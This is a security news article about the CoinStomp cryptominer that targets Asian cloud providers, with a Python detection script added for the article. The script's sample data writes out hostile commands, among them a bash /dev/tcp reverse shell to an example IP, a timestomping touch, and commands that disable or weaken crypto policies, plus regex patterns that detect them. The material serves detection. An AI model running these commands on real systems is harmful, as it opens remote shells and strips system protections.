Asian Cloud Service Providers Face Threats from CoinStomp Cryptominer


CoinStomp, a new malware family that mines cryptocurrencies on cloud services, has been discovered. This malware appears to be targeting cloud service providers in Asia at the moment.

CoinStomp: what is it?

The key findings about CoinStomp are presented below.

CoinStomp provides a number of features, including timestomping, deactivating system-wide cryptographic policies, and employing a /dev/tcp reverse shell to initiate C2 communication.

On Linux systems, the timestomping feature manipulates file timestamps using the touch command, and the reverse shell relies on /dev/tcp, a natively available way of building a reverse shell or C2 communication channel without any additional tooling.

Additionally, some evidence linking the code to a cryptojacking threat group known as Xanthe has been discovered. According to researchers, however, the evidence was insufficient to support this attribution.

Anti-forensic techniques

The malware tries to mess with Linux server cryptographic policies to avoid forensic actions against itself.

These policies are designed to prevent malicious executables from running. As a result, before engaging in any other action, the malware's authors use the kill command to disable the system-wide cryptographic settings.

Furthermore, the malware is built to withstand any attempt by administrators to reverse that operation, so that it can still fulfil its objectives.

In the next stage, CoinStomp uses a reverse shell to connect to its C2 server. The script then downloads additional payloads and executes them as system-wide system services with root privileges.

Binaries for creating backdoors and a bespoke version of XMRig could be included in these payloads.
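The three behaviours described above (timestomping with touch, a /dev/tcp reverse shell, and tampering with the system-wide cryptographic policies) all leave traces in command-line telemetry. The following Python script is an added example for this article, not code from the original report or from the CoinStomp samples themselves; it runs a small set of regex rules over constructed command lines of the kind a shell-history or auditd EXECVE feed would provide, and reports which technique each line matches. It goes slightly beyond the article by also flagging update-crypto-policies being switched to LEGACY, which weakens the same policies by a different route; the sample commands, the IP address and the rule names are all assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample command lines (not captured CoinStomp activity). They
# stand in for shell-history entries or process-execution telemetry.
SAMPLE_COMMANDS = [
    "touch -r /bin/ls /tmp/.x/miner",                 # copy ls's timestamps onto a dropped file
    "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",     # bash /dev/tcp reverse shell (example IP)
    "kill -9 $(pgrep -f crypto-policies)",            # kill anything related to crypto-policies
    "update-crypto-policies --set LEGACY",            # weaken the policy instead of killing it
    "ls -la /var/log",                                # benign
    "systemctl daemon-reload",                        # benign
]


@dataclass
class Finding:
    technique: str   # rule label, see RULES
    line_no: int     # 1-based index into the scanned command list
    command: str     # the offending command line


# Each rule pairs a technique label with a regex over the command text.
RULES: List[Tuple[str, re.Pattern]] = [
    # timestomping: touch with -r/--reference (copy another file's times)
    # or -t/-d/--date (set an explicit time)
    ("timestomping",
     re.compile(r"\btouch\b[^\n]*\s(?:-(?:r|t|d)\b|--reference\b|--date\b)")),
    # bash's /dev/tcp/<host>/<port> pseudo-device opening an outbound socket
    ("dev_tcp_reverse_shell",
     re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    # killing crypto-policies processes, or setting the policy to LEGACY
    ("crypto_policy_tampering",
     re.compile(r"\bkill\b.*crypto-policies|update-crypto-policies\s+--set\s+LEGACY")),
]


def scan_commands(commands: List[str]) -> List[Finding]:
    """Return one Finding per (command, rule) match, in input order."""
    findings: List[Finding] = []
    for n, cmd in enumerate(commands, start=1):
        for technique, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(technique, n, cmd))
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Count findings per technique, useful as a one-line alert summary."""
    counts: dict = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_commands(SAMPLE_COMMANDS)
    for f in results:
        print(f"line {f.line_no}: {f.technique}: {f.command}")
    print("summary:", summarize(results))
```

The rules are deliberately narrow so they can be dropped into an existing alerting pipeline with few false positives; a legitimate use of touch -r (for example by a build system) will still match, so the timestomping hit is best treated as a triage signal to correlate with the other two rather than as an alert on its own.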

Conclusion

To undermine Linux security, the attackers are eliminating cryptographic policies. The use of anti-forensic tactics suggests that the attackers are also aware of incident response processes. These capabilities demonstrate the attackers' understanding of and expertise in cloud security, making CoinStomp a serious threat.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company. We are also a proud member of EC-Council, NASSCOM, the Data Security Council of India (DSCI), the Indian Chamber of Commerce (ICC), the U.S. Chamber of Commerce, and the Confederation of Indian Industry (CII). The company was established in 2016 with the vision of providing cyber security to the digital world and making it hack proof. Why are we suddenly talking about cyber security? As technology develops, more and more companies are shifting their business to the digital world, which is resulting in an increase in cyber crime.
